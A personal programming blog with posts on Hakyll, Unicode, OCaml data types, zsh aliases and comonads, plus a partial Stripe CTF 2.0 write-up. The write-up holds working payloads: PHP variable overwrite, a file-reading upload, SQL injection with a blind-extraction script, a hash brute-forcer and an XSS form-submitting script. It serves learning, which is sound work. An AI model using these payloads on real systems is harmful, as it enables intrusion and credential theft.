Enter the void *

Hello, world !

Etienne Millon — Fri, 11 Nov 2011 00:00:00 UT

blog :: IO ()
blog =
  putStrLn "Hello, world !"

This is my first attempt at blogging, and I still don’t know what to expect. I will probably write about the following topics :

Programming, especially using functional languages.
Development of the Debian operating system.
Static analysis of software.
Computer security.

Like some of my friends, I decided to use a static blog generator. The first series of posts will be about setting this up with hakyll, git and S3. Stay tuned !

Hakyll 101

Etienne Millon — Mon, 21 Nov 2011 00:00:00 UT

So, the recent trend seems to be static blogging. Indeed, as a web application, a blog is mostly read-only. By generating static .html files, one can eliminate :

CPU load : static content is the easiest kind to serve, especially with modern servers using sendfile(2).
security issues : without dynamic page generation, the attack surface is vastly reduced. Authentication moves out of PHP or Python scripts and is handled the Unix way.
deployment problems : I don’t know a free host that won’t serve static files. I use S3 (and the free tier will often be enough !) but if I am not satisfied, it’s dead simple to migrate.

Basically, it’s like moving from a dynamic language to a static one ☺. The only problem is if you want to add comments. The popular solution is Disqus but it is unfortunately a non-free application. I’ll probably stick to it but I fear data lock-in.

As it is fashionable, a lot of tools have appeared : pelican, blogofile, ikiwiki, jekyll… Being a haskeller, I decided to give hakyll a try.

Hakyll is a Haskell library for writing and deploying static websites ; that’s about it. As in a dynamic application, you define routes and how to serve them :

makeCss :: Rules
makeCss =
  void $ match "css/*" $ do
      route   idRoute
      compile compressCssCompiler

Most rules consist of compiling markdown to HTML (with the fantastic pandoc library) and copying stuff around.

Once compiled, the resulting binary can be run to preview the site, build it, or even deploy it.

 ~/www/blog [master] % ./blog
ABOUT

This is a Hakyll site generator program. You should always
run it from the project root directory.

USAGE

blog build           Generate the site
blog clean           Clean up and remove cache
blog help            Show this message
blog preview [port]  Run a server and autocompile
blog rebuild         Clean up and build again
blog server [port]   Run a local test server
blog deploy          Upload/deploy your site

So far I’ve found it very easy to use. That’s it for this first mini-tour. Stay tuned !

Unicode : Math, Greek, symbols - you name it !

Etienne Millon — Mon, 28 Nov 2011 00:00:00 UT

EBCDIC, ASCII & the power of legacy

… and no, that’s not a movie title.

As you know, all your computer knows about is numbers, yet when you type on a keyboard, a character appears on your screen. This is thanks to character encodings.

There are several standards that define how characters (ie, glyphs) are encoded into numbers. Besides dinosaurs such as EBCDIC, the “classic” way of encoding is ASCII – that is what most modern¹ operating systems use internally.

The problem with ASCII is that it maps every character to a single byte with the most significant bit cleared, meaning that you can have a maximum of 128 glyphs. It’s “good enough” for English (hey, the A stands for American) but terrible for international characters. This is even worse considering that 33 of them (codes 0 to 31, plus DEL) are control characters, ie mostly legacy. Did you ever need to interpret DC2, SI or GS in a program ?
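These numbers are easy to check with Python's standard unicodedata module, which serves here only as a convenient oracle. Every ASCII code fits in 7 bits. The control characters are the ones in the Unicode general category "Cc". Strictly speaking, DEL (127) is one of them too.

```python
import unicodedata

ASCII = range(128)

# Every ASCII code fits in 7 bits: the most significant bit is always 0.
assert all(code & 0x80 == 0 for code in ASCII)

# Control characters carry the Unicode general category "Cc".
controls = [code for code in ASCII if unicodedata.category(chr(code)) == "Cc"]
printable = [chr(code) for code in ASCII if code not in controls]

print(len(controls), len(printable))  # control codes vs printable characters
```

Only 95 of the 128 slots are left for printable characters, and that count includes the space.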

Since the eighth bit is “reserved”, it can be used to support “extended characters”. Several vendors (including Microsoft) used the concept of “code pages” to put extra glyphs in the 128-255 range. For example, Latin-1 was used in Western Europe to display accented characters.
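To make the ambiguity concrete, here is a small Python sketch that decodes the very same byte with three legacy code pages. The byte 0xE9 and these three codecs are an arbitrary choice for illustration.

```python
# The same byte, read with three different legacy code pages.
raw = bytes([0xE9])
decoded = {cp: raw.decode(cp) for cp in ("latin-1", "cp1251", "cp437")}

for cp, text in decoded.items():
    print(f"{cp:8} -> {text} (U+{ord(text):04X})")
```

Without metadata saying which code page was used, a reader cannot tell whether the author meant é, й or Θ.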

If all your data comes from one part of the world, it works fine, but with the following limitations if you need to handle international data :

it becomes necessary to have metadata specifying which codepage has to be used.
you have to choose exactly one codepage per document.

In other words, a more extensible system is needed. Fortunately, this system exists and is called…

Unicode

Unicode separates two notions :

what is a character. Unicode includes a large collection of character names. For example, version 6.0 includes 109449 characters.
how a character is encoded as bytes. More precisely, this is the role of encodings such as UTF-8. Some of them, notably UTF-8, are compatible with ASCII (the byte representation coincides on characters 0-127).
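Here is a short Python sketch of this separation. ord gives the abstract code point, and encode turns the character into bytes. UTF-8 leaves ASCII text untouched. UTF-16 is shown for contrast because it does not.

```python
samples = ["A", "é", "β", "√", "✈"]

for ch in samples:
    encoded = ch.encode("utf-8")
    print(f"U+{ord(ch):04X} {ch} -> {encoded.hex(' ')} ({len(encoded)} bytes)")

# ASCII compatibility: pure ASCII text gives the same bytes in UTF-8.
ascii_text = "Hello, world !"
same_bytes = ascii_text.encode("utf-8") == ascii_text.encode("ascii")

# UTF-16, by contrast, spends two bytes even on "A".
utf16_bytes = "A".encode("utf-16-le")
```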

What’s nice is that it’s easy to enter Unicode under X11. The last two sections explain how you can configure your system to type (for example) √, β and ✈ !

Configure a compose key

A “compose” key, or Multi_key under X11, begins a character compose sequence. For example, when I type the compose key followed by a short key sequence, a square root (U+221A √) is entered.

To configure a compose key, you can use xmodmap(1). Put the following into ~/.Xmodmap to make your right control key act as a Multi_key :

keysym Control_R = Multi_key

Unfortunately, this file is not loaded automatically, so you have to run xmodmap ~/.Xmodmap when opening an X session (this can be done automatically if you put it in your ~/.xsession, for example).

Define a .XCompose mapping

The second part is to define mappings between key sequences and Unicode code points. This is the role of the ~/.XCompose file.

As described in xcompose(5), a line looks like :

: "✈" U2708 # AIRPLANE

ie, a key sequence, a colon, the string to insert and the corresponding keysym (here U2708, the code point of ✈). The trailing comment, which holds the character name, does not hurt, as usual.
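The U2708 part names a Unicode code point in hexadecimal. As an illustration, a hypothetical helper keysym_to_char turns such a keysym back into its character, and Python's unicodedata gives the name you would put in the comment. The helper only handles the "U" + hex form, not symbolic keysyms such as Multi_key.

```python
import unicodedata


def keysym_to_char(keysym: str) -> str:
    """Hypothetical helper: turn a 'U'+hex keysym such as U2708 into its character."""
    if not keysym.startswith("U"):
        raise ValueError(f"not a Unicode keysym: {keysym}")
    return chr(int(keysym[1:], 16))


airplane = keysym_to_char("U2708")
print(airplane, unicodedata.name(airplane))  # the name used in the comment
```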

To start your own list of bindings, I suggest kragen’s repository, which includes an excellent set. And if you need to find a specific unicode character, the unicode script is very useful !

TL;DR: Spread the word, ♥ Unicode ☺

Yes, that excludes AS/400.↩︎

What's in an ADT ?

Etienne Millon — Wed, 14 Dec 2011 00:00:00 UT

Introduction

Algebraic Data Types, or ADTs for short, are a core feature of functional languages such as OCaml or Haskell. They are a handy model of closed disjoint unions and, unfortunately, they are seldom used outside of the functional realm.

In this article, I will explain what ADTs are, how they are used in OCaml and what trimmed-down versions of them exist in other languages. I will use OCaml, but the big picture is about the same in Haskell.

Principles

Functional languages offer a myriad of types for the programmer.

some base types, such as int, char or bool.

functions, ie arrow types. A function with domain a and codomain b has type a -> b.

tuples, ie product types. A tuple is a heterogeneous, fixed-width container type (its set-theoretic counterpart is the cartesian product). For example, (2, true, 'x') has type int * bool * char. Record types are a (mostly) syntactic extension that gives names to the fields.

some parametric types. For example, if t is a type, t list is the type of homogeneous linked lists of elements having type t.

what we are talking about today, algebraic types (or sum types, or variant types).

If product types represent the cartesian product, algebraic types represent the disjoint union. In other words, they are well suited to case analysis.

We will take the example of integer ranges. One can say that an integer range is either :

the empty range

of the form ]-∞;a]

of the form [a;+∞[

an interval of the form [a;b] (where a ≤ b)

the whole range (ie, ℤ)

With the following properties :

Disjunction : no range can be of two forms at a time.

Injectivity : if [a;b] = [c;d], then a = c and b = d (and similarly for other forms).

Exhaustiveness : it cannot be of another form.

Syntax & semantics

This can be encoded as an ADT :

type range =
  | Empty
  | HalfLeft of int
  | HalfRight of int
  | Range of int * int
  | FullRange

Empty, HalfLeft, HalfRight, Range and FullRange are the constructors of range. They are the only way to build a value of type range. For example, Empty, HalfLeft 3 and Range (2, 5) are all values of type range¹. They each have a specific arity (the number of arguments they take).

To deconstruct a value of type range, we use a powerful construct, pattern matching, which is about matching a value against a sequence of patterns (yes, that’s about it).

To illustrate this, we will write a function that computes the minimum value of such a range. Of course, this can be ±∞ too, so we have to define a type to represent the return value.

type ext_int =
  | MinusInfinity
  | Finite of int
  | PlusInfinity

In a math textbook, we would write the case analysis as :

min ∅ = +∞

min ]-∞;a] = -∞

min [a;+∞[ = a

min [a;b] = a

min ℤ = -∞

That translates to the following (executable !) OCaml code :

let range_min x =
  match x with
  | Empty -> PlusInfinity
  | HalfLeft a -> MinusInfinity
  | HalfRight a -> Finite a
  | Range (a, b) -> Finite a
  | FullRange -> MinusInfinity

In the pattern HalfLeft a, a is a variable name, so it gets bound to the argument’s value. In other words, match (HalfLeft 2) with HalfLeft x -> e binds x to 2 in e.

It’s functions all the way down

Pattern matching seems magical at first, but it is only a syntactic trick. Indeed, the definition of the above type is equivalent to the following definition :

type range
(* The following is not syntactically correct *)
val Empty : range
val HalfLeft : int -> range
val HalfRight : int -> range
val Range : int * int -> range
val FullRange : range
(* Moreover, we know that they are injective and mutually disjoint *)
val deconstruct_range :
  (unit -> 'a) ->
  (int -> 'a) ->
  (int -> 'a) ->
  (int * int -> 'a) ->
  (unit -> 'a) ->
  range -> 'a

deconstruct_range is what replaces pattern matching. It also embodies the notion of exhaustiveness, because given any value of type range, we can build a deconstructed value out of it.

Its type looks scary at first, but if we look closer, its arguments are a sequence of case-specific deconstructors² and the value to get “matched” against.

To show the equivalence, we can implement deconstruct_range using pattern matching and range_min using deconstruct_range³ :

let deconstruct_range f_empty f_halfleft f_halfright f_range f_fullrange x =
  match x with
  | Empty -> f_empty ()
  | HalfLeft a -> f_halfleft a
  | HalfRight a -> f_halfright a
  | Range (a, b) -> f_range (a, b)
  | FullRange -> f_fullrange ()

let range_min' x =
  deconstruct_range
    (fun () -> PlusInfinity)
    (fun a -> MinusInfinity)
    (fun a -> Finite a)
    (fun (a, b) -> Finite a)
    (fun () -> MinusInfinity)
    x
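The idea can be pushed one step further. If a value is represented by its own deconstructor, pattern matching disappears entirely. This technique is usually called the Scott encoding. The Python sketch below only illustrates it; it is not how OCaml implements range. The constructor names are hypothetical lower-case mirrors of the OCaml ones, and interval stands for Range to avoid shadowing Python's builtin. Float infinities replace ext_int for brevity.

```python
# Scott encoding of `range`: each value *is* a function that receives one
# handler per constructor (in deconstruct_range's order) and calls the right one.
# Nullary constructors pass (), mirroring the `unit -> 'a` handlers.

def empty():
    return lambda e, hl, hr, r, f: e(())


def half_left(a):
    return lambda e, hl, hr, r, f: hl(a)


def half_right(a):
    return lambda e, hl, hr, r, f: hr(a)


def interval(a, b):
    return lambda e, hl, hr, r, f: r((a, b))


def full_range():
    return lambda e, hl, hr, r, f: f(())


def deconstruct_range(f_empty, f_halfleft, f_halfright, f_range, f_fullrange, x):
    # No pattern matching here: the value selects its own case.
    return x(f_empty, f_halfleft, f_halfright, f_range, f_fullrange)


def range_min(x):
    # Float infinities stand in for MinusInfinity / PlusInfinity.
    return deconstruct_range(
        lambda _unit: float("inf"),   # Empty
        lambda _a: float("-inf"),     # HalfLeft a
        lambda a: a,                  # HalfRight a
        lambda ab: ab[0],             # Range (a, b)
        lambda _unit: float("-inf"),  # FullRange
        x,
    )
```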

Implementation

After this trip in denotational-land, let’s get back to operational-land : how is this implemented ?

In OCaml, no type information exists at runtime. Every value has a uniform representation : it is either an integer or a pointer to a block. Each block starts with a header holding its tag and size, followed by its fields.

With the Obj module (kids, don’t try this at home), it is possible to inspect blocks at runtime. Let’s write a dumper for range values and look at its output :

(* Range of integers between a and b *)
let rec rng a b =
  if a > b then [] else a :: rng (a+1) b

let view_block o =
  if (Obj.is_block o) then
    begin
      let tag = Obj.tag o in
      let sz = Obj.size o in
      let f n =
        let f = Obj.field o n in
        assert (Obj.is_int f);
        Obj.obj f
      in
      tag :: List.map f (rng 0 (sz-1))
    end
  else if Obj.is_int o then
    [Obj.obj o]
  else
    assert false

let examples () =
  let p_list l = String.concat ";" (List.map string_of_int l) in
  let explore_range r =
    print_endline (p_list (view_block (Obj.repr r)))
  in
  List.iter explore_range
    [ Empty
    ; HalfLeft 8
    ; HalfRight 13
    ; Range (2, 5)
    ; FullRange
    ]

When we run examples (), it outputs :

0
0;8
1;13
2;2;5
1

We can see the following distinction :

0-ary constructors (Empty and FullRange) are encoded as simple integers (0 and 1).

the other ones are encoded as blocks with a constructor number as tag (0 for HalfLeft, 1 for HalfRight and 2 for Range), followed by their arguments.

Thanks to this uniform representation, pattern matching is straightforward : the compiled code only has to check whether the value is an integer or a block, then look at the tag number to decide which constructor has been used. If there are arguments to be bound, they follow in the same block.
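The following Python toy model replays this two-step dispatch. It assumes the layout observed in the dump above : immediate integers for constant constructors and tagged blocks for the others. Block, dump and the constant names are made up for the sketch and only mimic what the OCaml runtime does.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Block:
    """A heap block: a small tag followed by the constructor's arguments."""
    tag: int
    fields: tuple


# Constant constructors are numbered among themselves...
EMPTY, FULL_RANGE = 0, 1
# ...and so are the constructors with arguments, which become block tags.
HALF_LEFT, HALF_RIGHT, RANGE = 0, 1, 2


def dump(v) -> str:
    # Same format as the OCaml dumper: an integer, or "tag;field;field".
    if isinstance(v, int):
        return str(v)
    return ";".join(str(x) for x in (v.tag, *v.fields))


def range_min(v):
    # First question: immediate integer or pointer to a block?
    if isinstance(v, int):
        return float("inf") if v == EMPTY else float("-inf")
    # Second question: which tag? The arguments sit in the block's fields.
    if v.tag == HALF_LEFT:
        return float("-inf")
    if v.tag in (HALF_RIGHT, RANGE):
        return v.fields[0]
    raise ValueError(f"unknown tag {v.tag}")


values = [EMPTY, Block(HALF_LEFT, (8,)), Block(HALF_RIGHT, (13,)),
          Block(RANGE, (2, 5)), FULL_RANGE]
print("\n".join(dump(v) for v in values))
```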

Conclusion

Algebraic Data Types are a simple model of disjoint unions, for which case analysis is the most natural tool. In more mainstream languages, some alternatives exist but they are less suited to modelling the same problem.

For example, in object-oriented languages, the Visitor pattern is the natural way to do it. But class hierarchies are inherently “open”, thus breaking the exhaustiveness property.

The closest implementation is tagged unions in C, but they require you to roll your own solution using enums, structs and unions. This also means that all your hand-allocated blocks will have the same size (that of the largest variant).

Oh, and I would love to know how this problem is solved with other paradigms !

Unfortunately, so is Range (10, 2). The invariant that a ≤ b has to be enforced by the programmer when using this constructor.↩︎

For 0-ary constructors, the type has to be unit -> 'a instead of 'a to allow side effects to happen during pattern matching.↩︎

More precisely, we would have to show that any function written with pattern matching can be adapted to use the deconstructor instead. I hope that this example is general enough to get the idea.↩︎

ZSH suffix aliases

Etienne Millon — Tue, 17 Jan 2012 00:00:00 UT

I recently changed my login shell to use zsh instead of the venerable bash. I am still wondering why I didn’t make the change earlier. Zsh’s infamous slowness is almost imperceptible, at least with the default configuration.

One cool feature present in zsh is the notion of suffix alias (described in zshbuiltins(1)). Quick example :

$ alias -s pdf=evince
$ filename.pdf

… will open filename.pdf under evince, as if evince filename.pdf had been typed. Handy !

But it is not restricted to files : the command is executed whenever the command line matches a suffix alias. So, for example you can define :

alias -s git='git clone'

… so that every time you paste a URL ending in .git, say git://git.debian.org/git/aptitude/aptitude.git, it will be git-cloned.

Stripe CTF 2.0 (partial) writeup

Etienne Millon — Thu, 30 Aug 2012 00:00:00 UT

The Stripe CTF 2.0 is over ! Massive props to Stripe for this great edition. I was stuck on level 5 but here is a humble writeup.

Level 0 : the Secret Safe

The first level is a web application written in node.js that holds a password in a SQLite database.

The error is in the following line :

var query = 'SELECT * FROM secrets WHERE key LIKE ? || ".%"';

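“LIKE” does not take a regular expression but a pattern, in which % matches any sequence of characters (and _ any single character). The user input is concatenated with ".%", so entering “%” produces the pattern %.%, which matches the keys of every namespace and reveals the password.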
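The behaviour is easy to reproduce with Python's sqlite3 module. The table contents below are made up. This sketch puts '.%' in single quotes, because SQLite only accepts double-quoted string literals as a compatibility quirk that some builds disable.

```python
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE secrets (key TEXT, secret TEXT)")
db.executemany(
    "INSERT INTO secrets VALUES (?, ?)",
    [("alice.notes", "hello"), ("bob.password", "hunter2")],  # made-up rows
)

# Same shape as the level's query: the user's namespace is glued to ".%".
QUERY = "SELECT key FROM secrets WHERE key LIKE ? || '.%' ORDER BY key"


def lookup(namespace):
    return [row[0] for row in db.execute(QUERY, (namespace,))]


print(lookup("alice"))  # only alice's keys
print(lookup("%"))      # "%" is a wildcard: the pattern becomes "%.%"
```

The placeholder correctly prevents SQL injection, but it cannot stop LIKE from interpreting wildcards inside the value.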

Level 1 : the Guessing Game

Here we have the following PHP script :

<html>
  <head>
    <title>Guessing Game</title>
  </head>
  <body>
    <h1>Welcome to the Guessing Game!</h1>
    <p>
      Guess the secret combination below, and if you get it right,
      you'll get the password to the next level!
    </p>
    <?php
      $filename = 'secret-combination.txt';
      extract($_GET);
      if (isset($attempt)) {
        $combination = trim(file_get_contents($filename));
        if ($attempt === $combination) {
          echo "<p>How did you know the secret combination was" .
               " $combination!?</p>";
          $next = file_get_contents('level02-password.txt');
          echo "<p>You've earned the password to the access Level 2:" .
               " $next</p>";
        } else {
          echo "<p>Incorrect! The secret combination is not $attempt</p>";
        }
      }
    ?>
    <form action="#" method="GET">
      <p><input type="text" name="attempt"></p>
      <p><input type="submit" value="Guess!"></p>
    </form>
  </body>
</html>

The intent is that the script receives an “attempt” parameter, reads a file and compares the attempt with the file contents. But it uses a very insecure method of doing so : the function extract copies its associative array argument directly into the symbol table.

For example, the following script :

<?php
$vars = array('a' => 2, 'b' => 'foo');
extract($vars);
echo "a = $a, b = $b\n";
?>

outputs :

a = 2, b = foo

As the argument $_GET is controlled by the attacker, it means that we can overwrite any variable, including $filename. By providing the script the name of another file whose contents are known, we can bypass the check. There’s a very good candidate for such a file : index.php itself.
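Here is a rough Python analogue of the bug, for readers who do not speak PHP. The scope dictionary stands in for PHP's symbol table, update plays the role of extract, and the file names and contents are placeholders. The point is only that whoever controls the merged mapping also controls filename.

```python
def check_attempt(get_params, read_file):
    # scope plays the role of PHP's symbol table.
    scope = {"filename": "secret-combination.txt"}
    scope.update(get_params)  # extract($_GET): request parameters win every clash
    if "attempt" not in scope:
        return False
    combination = read_file(scope["filename"]).strip()  # trim(file_get_contents(...))
    return scope["attempt"] == combination


# Placeholder file system: the attacker cannot read the first file,
# but knows the contents of the second one.
FILES = {
    "secret-combination.txt": "unguessable\n",
    "index.php": "<html>...</html>\n",
}

honest = check_attempt({"attempt": "guess"}, FILES.__getitem__)
attack = check_attempt(
    {"attempt": "<html>...</html>", "filename": "index.php"}, FILES.__getitem__
)
```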

So, let’s url-encode the file (we also have to trim the last newline) and issue the following GET request with curl :

% curl localhost:8000/index.php \
    -G \
    -d filename=index.php \
    -d attempt=$(perl -MURI::Escape \
        -e '{local $/; $_=<>;} chomp; print uri_escape $_' \
        < index.php)
[...]!?
You've earned the password to the access Level 2: dummy-password [...]

Level 2 : the Social Network

Level 2 is a small script, also in PHP, where you can upload a picture and display it. But it’s also done in an insecure way :

the files are uploaded in a visible folder

any file extension is allowed

the server will execute everything with a .php extension

Have a small idea ? :) We can write a PHP script, upload it and execute it from the upload directory. If it contains code to read the secret password, we’re done :

<?php
echo (file_get_contents("../password.txt"));
?>

Level 3 : the Secret Vault

The next level is a small application where you enter a login and a password, and if it matches one in the database, you have access to a secret. This time it is written in Python, using the Flask microframework. Better than PHP but it seems that the (fictional) developer has never heard about SQL injections !

The relevant lines are :

query = """SELECT id, password_hash, salt FROM users WHERE username = '{0}' LIMIT 1""".format(username)
cursor.execute(query)

res = cursor.fetchone()
if not res:
    return "There's no such user {0}!\n".format(username)
user_id, password_hash, salt = res

calculated_hash = hashlib.sha256(password + salt)
if calculated_hash.hexdigest() != password_hash:
    return "That's not the password for {0}!\n".format(username)

The query is vulnerable to SQL injection : if username contains a quote, it will close the opening one. For example, if it is ' OR 1=1 --, the full query is still valid : SELECT id, password_hash, salt FROM users WHERE username = '' OR 1=1 --' LIMIT 1 (everything after -- is a comment).

% curl http://localhost:5000/login -d "username=' OR 1=1 --" -d password=foo
That's not the password for ' OR 1=1 --!

Note that the error message is different when the query evaluates to something false :

% curl http://localhost:5000/login -d "username=' OR 1=2 --" -d password=foo
There's no such user ' OR 1=2 --!

This means that we have a way to evaluate arbitrary (boolean) expressions. Using subqueries, we can get information from the database :
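This oracle can be reproduced locally with sqlite3 and an in-memory users table. Its single row is made up, reusing bob's hash and salt found below. The sketch contrasts the string-formatted query with a parameterized one. In the parameterized version the driver passes the username separately, so the injection no longer changes the query.

```python
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (id INTEGER, username TEXT, password_hash TEXT, salt TEXT)")
db.execute(
    "INSERT INTO users VALUES (1, 'bob', "
    "'aee3d87d877c39d68e49c2c6e47789de3de40a73e2970fe2355011649932f5bb', 'zxqtgxi')"
)


def vulnerable_lookup(username):
    # Same shape as the Flask code: user input pasted into the SQL text.
    query = ("SELECT id, password_hash, salt FROM users "
             "WHERE username = '{0}' LIMIT 1").format(username)
    return db.execute(query).fetchone()


def safe_lookup(username):
    # Placeholder: the value is sent separately, so a quote stays a quote.
    query = "SELECT id, password_hash, salt FROM users WHERE username = ? LIMIT 1"
    return db.execute(query, (username,)).fetchone()


def oracle(condition):
    """True iff the injected condition holds, ie the app would answer
    "That's not the password" instead of "There's no such user"."""
    return vulnerable_lookup("' OR {0} --".format(condition)) is not None
```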

% curl http://localhost:5000/login \
    -d "username=' OR 1=(SELECT COUNT(*) FROM users WHERE username='bob') --" \
    -d password=foo
That's not the password for ' OR 1=(SELECT COUNT(*) FROM users WHERE username='bob') --!
% curl http://localhost:5000/login \
    -d "username=' OR 1=(SELECT COUNT(*) FROM users WHERE username='alice') --" \
    -d password=foo
There's no such user ' OR 1=(SELECT COUNT(*) FROM users WHERE username='alice') --!

The DB contains a user named “bob” but no user named “alice”. What about his password hash?

% for p in $(seq 0 9) a b c d e f ; do
    curl http://localhost:5000/login \
      -d "username=' OR 1=(SELECT COUNT(*) FROM users WHERE username='bob' AND password_hash LIKE '$p%') --" \
      -d password=foo
  done
There's no such user ' OR 1=(SELECT COUNT(*) FROM users WHERE username='bob' AND password_hash LIKE '0%') --!
There's no such user ' OR 1=(SELECT COUNT(*) FROM users WHERE username='bob' AND password_hash LIKE '1%') --!
There's no such user ' OR 1=(SELECT COUNT(*) FROM users WHERE username='bob' AND password_hash LIKE '2%') --!
There's no such user ' OR 1=(SELECT COUNT(*) FROM users WHERE username='bob' AND password_hash LIKE '3%') --!
There's no such user ' OR 1=(SELECT COUNT(*) FROM users WHERE username='bob' AND password_hash LIKE '4%') --!
There's no such user ' OR 1=(SELECT COUNT(*) FROM users WHERE username='bob' AND password_hash LIKE '5%') --!
There's no such user ' OR 1=(SELECT COUNT(*) FROM users WHERE username='bob' AND password_hash LIKE '6%') --!
There's no such user ' OR 1=(SELECT COUNT(*) FROM users WHERE username='bob' AND password_hash LIKE '7%') --!
There's no such user ' OR 1=(SELECT COUNT(*) FROM users WHERE username='bob' AND password_hash LIKE '8%') --!
There's no such user ' OR 1=(SELECT COUNT(*) FROM users WHERE username='bob' AND password_hash LIKE '9%') --!
That's not the password for ' OR 1=(SELECT COUNT(*) FROM users WHERE username='bob' AND password_hash LIKE 'a%') --!
There's no such user ' OR 1=(SELECT COUNT(*) FROM users WHERE username='bob' AND password_hash LIKE 'b%') --!
There's no such user ' OR 1=(SELECT COUNT(*) FROM users WHERE username='bob' AND password_hash LIKE 'c%') --!
There's no such user ' OR 1=(SELECT COUNT(*) FROM users WHERE username='bob' AND password_hash LIKE 'd%') --!
There's no such user ' OR 1=(SELECT COUNT(*) FROM users WHERE username='bob' AND password_hash LIKE 'e%') --!
There's no such user ' OR 1=(SELECT COUNT(*) FROM users WHERE username='bob' AND password_hash LIKE 'f%') --!

So, the hash starts with an “a”. By scripting this, we can get bob’s password hash and salt (from generate_data.py we know that the salt and the password are made of 7 lowercase letters).

#!/usr/bin/env python3
import string

import requests


def is_ok(query):
    # True when the injected condition holds ("not the password" branch).
    full_query = "' OR 1=" + query + " --"
    payload = {'username': full_query, 'password': 'foo'}
    url = "http://localhost:5000/login"
    r = requests.post(url, data=payload)
    return "not the password for" in r.text


def next_char(user, field, chars, prefix):
    for c in chars:
        q = "(SELECT COUNT(*) FROM users "\
            + "WHERE username = '{0}' "\
            + "AND {1} LIKE '{2}{3}%')"
        if is_ok(q.format(user, field, prefix, c)):
            return c
    # No character extends the prefix: the value is complete.
    print(prefix)
    return None


def crack(user, field, chars):
    prefix = ''
    while True:
        c = next_char(user, field, chars, prefix)
        if c is None:
            return
        prefix += c


if __name__ == '__main__':
    crack('bob', 'password_hash', string.hexdigits)
    crack('bob', 'salt', string.ascii_lowercase)

And the output is something like :

% ./level3.py
aee3d87d877c39d68e49c2c6e47789de3de40a73e2970fe2355011649932f5bb
zxqtgxi

Generating all candidate strings and their hashes is a bit too slow in Python, so I put together a small C program to do the heavy work.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <openssl/sha.h>

int main(int argc, char **argv)
{
    char salt[] = "zxqtgxi";
    unsigned char expected_hash[] =
        "\xae\xe3\xd8\x7d\x87\x7c\x39\xd6"
        "\x8e\x49\xc2\xc6\xe4\x77\x89\xde"
        "\x3d\xe4\x0a\x73\xe2\x97\x0f\xe2"
        "\x35\x50\x11\x64\x99\x32\xf5\xbb";
    /* 7-letter password, then the 7-letter salt, then a NUL for printf */
    char s[15] = {0};
    memcpy(&s[7], salt, 7);
    unsigned char hash[SHA256_DIGEST_LENGTH];
    SHA256_CTX sha256;

    /* One nested loop per password letter, from 'a' to 'z' */
#define LOOP(n) for (s[n] = 'a'; s[n] <= 'z'; s[n]++)
    LOOP(0) LOOP(1) LOOP(2) LOOP(3) LOOP(4) LOOP(5) LOOP(6)
    {
        SHA256_Init(&sha256);
        SHA256_Update(&sha256, s, 14);
        SHA256_Final(hash, &sha256);
        if (!memcmp(hash, expected_hash, SHA256_DIGEST_LENGTH)) {
            printf("FOUND : %s\n", s);
            exit(0);
        }
    }
    return 0;
}

A few minutes later, we have the answer.

Level 4 : the Karma Trader

New level, new language : Ruby this time. In this application, written with the Sinatra framework, you can create accounts and transfer karma to other users, with the rule that once you have transferred karma to a user, he can see your password. The goal is to get karma_fountain’s password, with the hint that he logs in often.

This strongly suggests an XSS attack in karma_fountain’s browser : by injecting a piece of JavaScript into the page, we’ll fill in and submit the transfer form. The obvious vector is the username ; alas, it is filtered :

unless username =~ /^\w+$/
  die("Invalid username. Usernames must match /^\w+$/", :register)
end

But the password is displayed too (to the users you sent karma to), so it is another possible vector. It turns out that it is not filtered, and is thus exploitable.

Let’s create a user “x” with the following password:

<script>
  var f = document.forms[0];
  f['to'].value="x";
  f['amount'].value="100";
  f.submit();
</script>

And to deliver this payload, we just have to send karma to karma_fountain. A minute or so later, his password appears.

Level 5 : the DomainAuthenticator

I couldn’t finish this level. It is also a Sinatra web application, which can make POST requests to hosts ending in stripe-ctf.com. When the response contains “AUTHENTICATED”, you are marked as logged in as this host. The goal is to log in as a host name matching ^level05-\d+\.stripe-ctf\.com$. I tried two different techniques.

The first one is to have the level 5 host make a request to itself, so that this request triggers another request to an arbitrary server under our control (the server from level 2 can be used for this). The main problem is that the application needs 3 parameters : “username”, “password” and “pingback”, and it only passes the first two of them to the pingback URL. I tried parameter injection (appending a &pingback=... to the password), but it was filtered out.

The second one is to slightly abuse HTTP : a single host can have two hostnames and serve different content depending on the “Host:” HTTP header. If levels 2 and 5 ran on the same IP, we could run a custom HTTP server on a high port, so that the POST would succeed (this would work because there is no check that the port is 80). Unfortunately, the two levels run on different hosts, so this does not work.

Other levels

A lot of complete solutions have been published since, for example this one. I’m quite frustrated because I’m almost sure that I tried adding a ?pingback parameter on level 5. Anyway, I hope that the next edition will be as interesting as this one, and that this time, I’ll win a t-shirt :)

Comonadic Life

Etienne Millon — Thu, 18 Oct 2012 00:00:00 UT

Of monads and comonads

This post is written in Literate Haskell. This means that you can copy it into a .lhs file¹ and run it through a Haskell compiler or interpreter.

Today we’ll talk about…

import Control.Comonad
import Control.Monad

Comonads ! They are the categorical dual of monads, which means that the type signatures of comonadic functions look like those of monadic functions, but with the arrows reversed. I am not an expert in category theory, so I won’t go further.

I will use the following typeclass for comonads : it’s from Edward Kmett’s comonad package (split from the infamous category-extras package).

class Functor w => Comonad w where
  extract   :: w a -> a
  extend    :: (w a -> b) -> w a -> w b
  duplicate :: w a -> w (w a)

Only one of extend and duplicate needs to be defined, as each can be written in terms of the other. The Monad typeclass, for reference, can be described as² :

class Functor m => Monad m where
  return :: a -> m a
  (=<<)  :: (a -> m b) -> m a -> m b
  join   :: m (m a) -> m a

The duality is quite easy to see : extract is the dual of return, extend the one of (=<<) and duplicate the one of join.

So what are comonads good for ?

I stumbled upon an article which explains that they can be used for computations which depend on some local environment, like cellular automata. Comments ask whether it’s possible to generalize to higher dimensions, which I will do by implementing Conway’s Game of Life in a comonadic way.

List Zippers

List zippers are a fantastic data structure, allowing O(1) edits at a “cursor”. Moving the cursor element to element is O(1) too. This makes it a very nice data structure when your edits are local (say, in a text editor). You can learn more about zippers in general in this post from Edward Z Yang. The seminal paper is of course Huet’s article.

A list zipper is composed of a cursor and two lists.

data ListZipper a = LZ [a] a [a]

To go in a direction, you pick the head of a list, set it as your cursor, and push the cursor on top of the other list. We assume that we will only use infinite lists, so this operation cannot fail. This assumption is reasonable, especially in the context of cellular automata³.

listLeft :: ListZipper a -> ListZipper a
listLeft (LZ (l:ls) x rs) = LZ ls l (x:rs)
listLeft _ = error "listLeft"

listRight :: ListZipper a -> ListZipper a
